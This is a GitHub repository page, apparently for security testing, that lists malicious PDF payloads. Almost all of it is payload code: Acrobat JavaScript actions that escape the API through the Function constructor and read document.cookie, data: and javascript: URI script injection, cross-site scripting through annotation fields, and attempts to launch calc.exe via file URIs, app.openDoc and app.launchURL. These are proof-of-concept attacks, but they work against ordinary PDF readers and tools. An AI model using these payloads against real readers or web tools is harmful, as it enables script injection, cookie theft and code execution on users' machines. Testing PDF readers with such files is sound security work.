luigigubello / PayloadsAllThePDFs

PDF Files for Pentesting

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Payloads All The PDFs

Follow @evaristegal0is

A list of crafted malicious PDF files to test the security of PDF readers and tools.

Vulnerabilities found

Payloads list


Line 31. Understand if Acrobat Javascript APIs are supported.

/JS (app.alert\(1\); Object.getPrototypeOf(function*(){}).constructor = null; ((function*(){}).constructor("document.write('<script>confirm(document.cookie);</script><iframe src=>');"))().next();)

Line 69. Try to run arbitrary Javascript abusing the data URI scheme.

/URI (data:text/html,<script>alert\(2\);</script>)

Line 177. Try to inject Javascript code using annotations.

<</Type /Annot /Rect [284.7745656638 581.6814031126 308.7745656638 605.6814031126 ] /Subtype /Text /M (D:20210402013803+02'00) /C [1 1 0 ] /Popup 15 0 R /T (\">'><details open ontoggle=confirm\(3\)>) /P 6 0 R /Contents (��^@"^@>^@'^@>^@<^@d^@e^@t^@a^@i^@l^@s^@ ^@o^@p^@e^@n^@ ^@o^@n^@t^@o^@g^@g^@l^@e^@=^@c^@o^@n^@f^@i^@r^@m^@\(^@'^@X^@S^@S^@'^@\)^@>) >>


Line 69. Try to run arbitrary Javascript abusing the data URI scheme.

/URI (\">'><details open ontoggle=confirm\(2\)>)


Line 31. Understand if the PDF reader or tool runs arbitrary Javascript bypassing the Acrobat APIs.

/JS (app.alert\(1\); confirm\(2\); prompt\(document.cookie\); document.write\("<iframe src=''>"\);)

Line 69. Try to run remote commands on Windows.

/URI (file:///C:/Windows/system32/calc.exe)


Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.

/JS (app.alert\(1\); app.openDoc("/C/Windows/System32/calc.exe");)

Line 69. Try to run remote commands on Windows.

 /URI (START C:/\Windows/\system32/\calc.exe)


Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.

/JS (app.alert\(1\); app.launchURL\("START C:/\Windows/\system32/\calc.exe", true\); app.launchURL\("javascript:confirm\(3\);", true\);)

Line 69. Try to run arbitrary Javascript abusing the data URI scheme.

 /URI (javascript:confirm\(2\);)


Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.

 /JS (app.alert\(1\); app.launchURL\("/C/Windows/system32/calc.exe", true\); app.launchURL\("'><details open ontoggle=confirm\(3\);", true\);)

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PDF Files for Pentesting

License:Apache License 2.0